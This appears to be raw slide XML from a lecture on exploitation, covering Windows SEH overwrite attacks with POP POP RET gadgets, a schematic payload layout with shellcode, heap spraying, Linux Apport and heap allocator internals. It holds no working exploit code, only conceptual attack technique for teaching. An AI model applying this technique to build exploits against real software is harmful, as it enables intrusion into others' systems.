                <a:lnTo>
                  <a:pt x="11116" y="35729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17071" y="63916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="70664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23" name="Shape 723"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6312150" y="5369300"/>
            <a:ext cx="1826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arguments for the SE Handler function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="724" name="Shape 724"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-57000" y="41729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25" name="Shape 725"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-57000" y="48587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Jumping to another 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(#2)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Usually the shellcode is placed right after the SE Handler value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 can point to any set of instructions in the target module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 common target is a set of "POP POP RET" instructions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732" name="Shape 732"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600900" y="4126491"/>
            <a:ext cx="2114100" cy="2292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ESP RET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Establisher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Context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 Context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3380050" y="3511150"/>
            <a:ext cx="2302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Dispatcher's Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="734" name="Shape 734"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="46227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5" name="Shape 735"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="50799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6" name="Shape 736"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="54609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7" name="Shape 737"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="59181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8" name="Shape 738"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="40003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9" name="Shape 739"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="4717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0" name="Shape 740"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408250" y="35873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741" name="Shape 741"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="54028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2" name="Shape 742"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="732" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5715000" y="5272791"/>
            <a:ext cx="994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3" name="Shape 743"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6818300" y="4952450"/>
            <a:ext cx="1846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points back to the program stack where  the  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*Next SEH Record is</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="Shape 744"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-57000" y="41729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45" name="Shape 745"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-57000" y="47825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46" name="Shape 746"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2411725" y="4044436"/>
            <a:ext cx="1190950" cy="1205268"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="29155" w="47638">
                <a:moveTo>
                  <a:pt x="0" y="27856"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2911" y="27723"/>
                  <a:pt x="13497" y="31164"/>
                  <a:pt x="17467" y="27062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21436" y="22959"/>
                  <a:pt x="18790" y="7741"/>
                  <a:pt x="23819" y="3242"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28847" y="-1257"/>
                  <a:pt x="43668" y="595"/>
                  <a:pt x="47638" y="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 POP RET explained</a:t>
            </a:r>
          </a:p>
        </p:txBody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Exception dispatcher will jump to whatever code we point it to in the target module.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we point it to an arbitrary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pop pop ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> sequence, the following will happen to the stack:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Shape 753"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600900" y="4126491"/>
            <a:ext cx="2114100" cy="2292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ESP RET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Establisher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Context Record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Dispatcher Context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380050" y="3511150"/>
            <a:ext cx="2302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Dispatcher's Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="755" name="Shape 755"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="46227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6" name="Shape 756"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="50799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7" name="Shape 757"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="54609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3618225" y="5918125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9" name="Shape 759"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2444048" y="4172925"/>
            <a:ext cx="1121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pop reg32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2444048" y="4630125"/>
            <a:ext cx="1121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pop reg32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2444048" y="5163525"/>
            <a:ext cx="1121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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="762" name="Shape 762"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="40003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3" name="Shape 763"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="4717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4" name="Shape 764"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408250" y="35873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765" name="Shape 765"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="54028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6" name="Shape 766"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-57000" y="41729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67" name="Shape 767"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-57000" y="47825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68" name="Shape 768"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2411725" y="4044436"/>
            <a:ext cx="1190950" cy="1205268"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="29155" w="47638">
                <a:moveTo>
                  <a:pt x="0" y="27856"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2911" y="27723"/>
                  <a:pt x="13497" y="31164"/>
                  <a:pt x="17467" y="27062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21436" y="22959"/>
                  <a:pt x="18790" y="7741"/>
                  <a:pt x="23819" y="3242"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28847" y="-1257"/>
                  <a:pt x="43668" y="595"/>
                  <a:pt x="47638" y="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69" name="Shape 769"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734425" y="2828550"/>
            <a:ext cx="6193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This is a common approach to jump back to the original program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 POP RET explained</a:t>
            </a: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After POP POP RET is executed in the target module, EIP will point to the original program's stack!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="Shape 776"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="40003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7" name="Shape 777"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="4717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8" name="Shape 778"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408250" y="35873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779" name="Shape 779"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="54028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0" name="Shape 780"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-57000" y="41729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81" name="Shape 781"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-57000" y="47825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2987344" y="3059619"/>
            <a:ext cx="394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EIP will now point here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="783" name="Shape 783"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="782" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2431444" y="3463719"/>
            <a:ext cx="2526000" cy="6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4" name="Shape 784"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5021925" y="4277575"/>
            <a:ext cx="32553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But at this point the EIP won't get to the shellcode!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Shape 7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450" y="2785875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 POP RET explained</a:t>
            </a:r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EIP will point to the stack now!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 attacker can replace the *Next SEH Record with instructions to jump to wherever the shellcode is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right after the attacker-crafted SE Handler value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jump 6 bytes, NOP NOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="792" name="Shape 792"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="40003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*Next SEH Record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0x0123456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3" name="Shape 793"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="4717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4" name="Shape 794"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408250" y="35873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795" name="Shape 795"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="54028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6" name="Shape 796"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-57000" y="41729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97" name="Shape 797"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-57000" y="47825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798" name="Shape 798"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687225" y="4000335"/>
            <a:ext cx="1915500" cy="2163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jmp 6 bytes forward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NOP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>NOP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0x0ABCDE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9" name="Shape 799"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687225" y="47170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0" name="Shape 800"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599250" y="3587350"/>
            <a:ext cx="239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stack (top record)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="801" name="Shape 801"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687225" y="5402858"/>
            <a:ext cx="191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2" name="Shape 802"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4134000" y="41729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803" name="Shape 803"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4134000" y="4782525"/>
            <a:ext cx="6849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4bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="804" name="Shape 804"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411375" y="4138625"/>
            <a:ext cx="1591075" cy="1314975"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="52599" w="63643">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8667" y="2911"/>
                  <a:pt x="41948" y="9196"/>
                  <a:pt x="52006" y="17467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62063" y="25737"/>
                  <a:pt x="67488" y="44000"/>
                  <a:pt x="60343" y="49624"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53197" y="55248"/>
                  <a:pt x="17666" y="50946"/>
                  <a:pt x="9131" y="51211"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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How it's exploited </a:t>
            </a:r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First handle any stack cookies (/GS cookies)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Then craft the payload to be as such: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[stack data ][next SEH*][SEH handler pointer   ][...]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["AA...AAAA"][jmp code ][pointer to pop pop ret][Shellcode]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requires executable stack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shellcode however need not be part of the buffer overflow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As long as its somewhere in memory, and the [next SEH*] can have code jump to it (no null bytes in the address), then the exploit will work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like a heap spray!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sz="3000" u="sng"/>
              <a:t>An important caveat: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target module address must have no null bytes in it!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 it can be injected into the vulnerable string buffer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If you are still fuzzy on this, check out this demo:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400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https://www.youtube.com/watch?v=ls_lfZdurHM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and SEH</a:t>
            </a:r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Linux does not support Structured Exception Handling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Linux's signal handling is conceptually quite similar to Windows's structured exception handling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Linux doesn't have the ability to pop up a window and say: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"XYZ has encountered and error and needs to close"...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WINE on Linux does implement SEH, and is a good (code) read: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http://source.winehq.org/source/include/wine/exception.h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lang="en" sz="2400"/>
              <a:t>uses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sigjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/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sigsetjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>, and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siglongjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> to implement it 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Apport: SEH emulation on Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody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Ubuntu 12.04+ emulates SEH this way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Intercepts crashes right when they happen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gathers info about the crash and the OS environment for bug reporting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runs as a service (usually root permissions)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/proc/sys/kernel/core_pattern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>to directly pipe coredumps to the apport service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/>
              <a:t>maybe exploitable???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be automatically invoked for unhandled exceptions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https://wiki.ubuntu.com/Apport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3" name="Shape 8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652" y="5104397"/>
            <a:ext cx="3476148" cy="144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Shape 8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00" y="5172450"/>
            <a:ext cx="46101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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2266576"/>
            <a:ext cx="6400800" cy="133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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="830" name="Shape 830"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3600451"/>
            <a:ext cx="64008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Hexedit (or hex editor of your choice)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nasm ("netwide" assembler for x86)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objdump (displays object file information)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gcc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gdb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ld (the GNU linker)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dd (extracting raw data (i.e. shellcode) from compiled binaries)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and most importantly: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shellcode tester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https://github.com/hellman/shtest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Generic tool that tests whether shellcode performs as expected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simple shellcode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networking shellcode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etc...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exploitation resources</a:t>
            </a:r>
          </a:p>
        </p:txBody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Shellcoder's Handbook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Practical Windows XP/2003 Heap Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, by John McDonald and Chris Valasek.  Blackhat USA 2009.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Heaps about Heaps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, by Brett Moore.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Breakdown</a:t>
            </a:r>
          </a:p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component: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>The memory allocator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goals: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efficiency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minimizing space (minimzing wasted space and fragmentation)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(Basic) Algorithms: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Boundary Tags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chunks of memory carry around meta data before and after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size information fields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allows for coalescing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allows for straightforward traversing of chunks (can traverse all chunks from any known chunk)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 Binning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chunks are maintained in bins, grouped by size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put chunks where they best fit to minimize waste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best-fit coalescing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360"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>coalesce: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>the act of merging two adjacent free blocks of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>used in garbage collection to compact the heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Shape 843"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5120850" y="3675200"/>
            <a:ext cx="3188400" cy="470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                   chunk                 meta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="844" name="Shape 844"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5709300" y="366450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5" name="Shape 845"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7766700" y="3664500"/>
            <a:ext cx="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6" name="Shape 846"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10700" y="5863000"/>
            <a:ext cx="921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Boundary Algorithm Example</a:t>
            </a:r>
          </a:p>
        </p:txBody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http://gee.cs.oswego.edu/dl/html/malloc.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="853" name="Shape 8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113871"/>
            <a:ext cx="5967072" cy="443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Binning Algorithm Example</a:t>
            </a:r>
          </a:p>
        </p:txBody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http://gee.cs.oswego.edu/dl/html/malloc.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="860" name="Shape 8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102043"/>
            <a:ext cx="6889108" cy="444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Heaps in action</a:t>
            </a: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2864447" y="1704688"/>
            <a:ext cx="58224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Heap initially starts off empty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Two structures are first written on the heap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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Heap Management Structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> contains all the info regarding the heap object and tracks the heap chunks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keeps track of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FreeList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(linked list that connects unallocated chunks together)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FreeList Bitmap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FreeList[0] pointer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FreeList[n] pointer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Then a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Free Chunk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There is always one Free Chunk in the heap object, and it points to the free space at the end of the heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="867" name="Shape 867"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470750" y="1743925"/>
            <a:ext cx="2343000" cy="483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Heap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Heap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8" name="Shape 868"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492150" y="21718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9" name="Shape 869"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492150" y="2857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0" name="Shape 870"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492150" y="3467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Heaps in action</a:t>
            </a:r>
          </a:p>
        </p:txBody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5389389" y="1704688"/>
            <a:ext cx="3297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After allocating two chunks, the heap now looks like this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Each chunk header has pointers to the next chunk and previous chunk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these pointers are used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intfree/free() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>for freeing chunks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="877" name="Shape 877"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470750" y="1743925"/>
            <a:ext cx="2343000" cy="483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Heap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Heap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8" name="Shape 878"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492150" y="21718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9" name="Shape 879"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492150" y="2857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0" name="Shape 880"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492150" y="3467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1" name="Shape 881"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909150" y="1743925"/>
            <a:ext cx="2343000" cy="483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Allocated A,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Heap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A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A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B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B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82" name="Shape 882"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="21718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3" name="Shape 883"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="2857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4" name="Shape 884"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="3467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5" name="Shape 885"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="4229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6" name="Shape 886"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="46864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7" name="Shape 887"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="5524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8" name="Shape 888"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="5905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Coalesce in action</a:t>
            </a:r>
          </a:p>
        </p:txBody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7743140" y="4315212"/>
            <a:ext cx="943800" cy="222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Coalescing occurs when two adjacent chunks are both free, and get merged</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="895" name="Shape 895"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470750" y="1743925"/>
            <a:ext cx="2343000" cy="483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Initial Heap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Heap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6" name="Shape 896"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492150" y="21718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7" name="Shape 897"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492150" y="2857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492150" y="3467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9" name="Shape 899"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909150" y="1743925"/>
            <a:ext cx="2343000" cy="483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Allocated A,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Heap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A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A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B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B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0" name="Shape 900"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="21718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1" name="Shape 901"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="2857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2" name="Shape 902"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="3467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3" name="Shape 903"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="4229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4" name="Shape 904"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="46864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5" name="Shape 905"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="5524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6" name="Shape 906"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930550" y="5905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7" name="Shape 907"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5347550" y="1743925"/>
            <a:ext cx="2343000" cy="483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Free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Heap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A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Chunk A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Free Chunk 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8" name="Shape 908"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5368950" y="21718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9" name="Shape 909"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5368950" y="28576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0" name="Shape 910"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5368950" y="3467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1" name="Shape 911"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5368950" y="42292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2" name="Shape 912"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5368950" y="4686475"/>
            <a:ext cx="233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</a:t>
            </a:r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Heap chunks are not allocated in a predictable manner like this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lots of design effort went into making allocator hard to predict</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="91440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3600"/>
